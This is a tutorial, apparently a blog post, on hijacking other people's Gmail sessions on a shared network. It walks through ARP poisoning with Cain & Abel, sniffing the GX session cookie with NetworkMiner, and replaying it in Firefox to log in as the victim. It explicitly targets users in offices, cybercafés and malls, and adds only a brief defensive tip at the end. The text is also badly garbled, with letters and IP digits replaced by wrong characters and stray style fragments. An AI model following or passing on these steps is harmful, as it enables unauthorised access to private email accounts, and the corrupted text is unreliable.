Hacking Gmail account using GX cookie

Introduction:
Hacking web application was always curious for the script kiddies. And hacking free web
email account is every geek first attempt. The method which I will describe in this post is
not new; the same method can be applied to yahoo and other free web email services
too.
The method we will be using is cookie stealing and replaying the same back to the Gmail
server. There are many ways you can steal cookie one of them is !"" #$ross site
scripting% discussed by other is earlier post. &ut we won'()t be using any !"" here in
our part of attack we will use some local tool to steal cookie and use that cookie to get
an access to Gmail account.
Assumption:
* +ou are in ,ocal Area -etwork #,A-% in a switched . wireless environment : e/ample :
office cyber caf01 2all etc.
* +ou know basic networking.
Tools used for this attack:
* $ain 3 Abel
* -etwork 2iner
* 4irefo/ web browser with $ookie 5ditor add6ons
Attack in detail:
7e assume you are connected to ,A-.7ireless network. 8ur main goal is to capture
Gmail G! cookie from the network. 7e can only capture cookie when someone is
actually using his gmail. I'()ve noticed normally in lunch time in office or during shift
start people normally check their emails. If you are in cyber caf01 or in 2all then there
are more chances of catching people using Gmail.
7e will go step by step
If you are using 7ireless network then you can skip this "tep A.
A9 :sing $ain to do A;< poisoning and routing:
"witch allows unicast traffic mainly to pass through its ports. 7hen ! and + are
communicating eachother in switch network then = will not come to know what ! 3 + are
communicating so inorder to sniff that communication you would have to poison A;<
table of switch for ! 3 +. In 7ireless you don'()t have to do poisoning because
7ireless Access points act like H:& which forwards any communication to all its ports
#recipients%.
* "tart $ain from "tart > <rogram > $ain > $ain
* $lick on "tart."top "nigger tool icon from the tool bar we will first scan the network to
see what all I<s are used in the network and this list will also help us to launch an attack
on the victim.
* Then click on "niffer Tab then Host Tab below. ;ight click within that spreadsheet and
click on "can 2ac Addresses from the Target section select
All hosts in my subnet and then press 8k. This will list all host connected in your
network. +ou will notice you won'()t see your <hysical I< of your machine in that list.
How to check your physical I< ?
> $lick on start > ;un type cmd and press enter in the command prompt type
Ipconfig and enter. This should show your I< address assign to your <$.
It will have following outputs:
5thernet adapter ,ocal Area $onnection:
$onnection6specific @$8,8;Ablue B important9@$8,8;Ablue B important9C-"@.color9
"uffi/ . : /yD.com@.color9
I< Address. . . . . . . . . . . . : EFG.EHI.E.G
"ubnet 2ask . . . . . . . . . . . : GJJ.GJJ.GJJ.K
Cefault @$8,8;Ablue B important9@$8,8;Ablue B important9Gateway@.color9 . . . . . . . . . :
EFG.EHI.E.E@.color9
2ain thing to know here is your I< address and your Cefault Gateway.
2ake a note of your I< Address 3 default gateway. 4rom $ain you will see list of I<
addresses here you have to choose any free I< address which is not used anywhere.
7e assume I< EFG.EHI.E.EK is not used anywhere in the network.
* $lick on $onfigure > A<; > :se "poof ed I< and 2A$ Address > I<
Type in EFG.EHI.E.EK and from the poisoning section click on '(L:se A;< reMuest
<ackets'(N and click on 8O.
* 7ithin the "niffer Tab below click on A<; Tab from the left hand side click on A<;
and now click on the right hand top spreadsheet then click on plus sign tool from top.
The moment you click that it will show you list of I< address on left hand side. Here we
will target the victim I< address and the default gateway.
The purpose is to do A;< poisoning between victim and the default gateway and route
the victim traffic via your machine. 4rom the left side click on Pictim I< address we
assume victim is using EFG.EHI.E.EJ. The moment you click on victim I< you will see
remaining list on the right hand side here you have to select default gateway I< address
i.e. EFG.EHI.E.E then click on 8O.
* 4inally $lick on "tart."top "niffer tool menu once again and ne/t click on "tart."top
A<;. This will start poisoning victim and default gateway.
&9 :sing -etwork 2iner to capture cookie in plain te/t
7e are using -etwork miner to capture cookie but -etwork miner can be used for
manythings from capturing te/t image HTT< parameters files. -etwork 2iner is
normally used in <assive reconnaissance to collect I< domain and 8" finger print of the
connected device to your machine. If you don'()t have -etwork miner you can use any
other sniffer available like 7ireshark Iris network scanner -et7itness etc.
7e are using This tool because of its ease to use.
* 8pen -etwork 2iner by clicking its e/e #pls note it reMuires .-et framework to work%.
* 4rom the '(L666"elect network adaptor in the list666'(L click on down arrow and
select your adaptor If you are using 5thernet wired network then your adaptor would
have 5thernet name and I< address of your machine and if you are using wireless then
adaptor name would contain wireless and your I< address. "elect the one which you are
using and click on start.
Important thing before you start this make sure you are not browsing any websites or
using any Instant 2esaging and you have cleared all cookies from firefo/.
* $lick on $redential Tab above. This tab will capture all HTT< cookies pay a close look
on '(LHost'(N column you should see somewhere mail.google.com. If you could locate
mail.google.com entry then in the same entry right click at :sername column and click
on '(Lcopy username'(N then open notepad and paste the copied content there.
* ;emove word wrap from notepad and search for G! in the line. $ookie which you have
captured will contain many cookies from gmail each would be separated by semicolon
# G! cookie will start with G!A and will end with semicolon you would have to copy
everything between A and semicolon
5/ample : G!A a/cvbEmDdwkfefv ; 0Qcopy only a/cvbEmDdwkfefv
-ow we have captured G! cookie its time now to use this cookie and replay the attack
and log in to victim email id for this we will use firefo/ and cookie editor add6ons.
$9 :sing 4irefo/ 3 cookie 5ditor to replay attack.
* 8pen 4irefo/ and log in your gmail email account.
* from firefo/ click on Tools > cookie 5ditor.
* In the filter bo/ type .google.com and <ress 4ilter and from below list search for
cookiename G!. If you locate G! then double click on that G! cookie and then from
content bo/ delete everything and paste your captured G! cookie from step&.R and click
on save and then close.
* 4rom the Address bar of 4irefo/ type mail.google.com and press enter this should
replay victim G! cookie to Gmail server and you would get logged in to victim Gmail
email account.
* "orryB +ou can'()t change password with cookie attack.
How to be saved from this kind of attack?
Google has provided a way out for this attack where you can use secure cookie instead
of unsecure cookie. +ou can enable secure cookie option to always use https from Gmail
settings.
"ettings > &rowser connection > Always use https.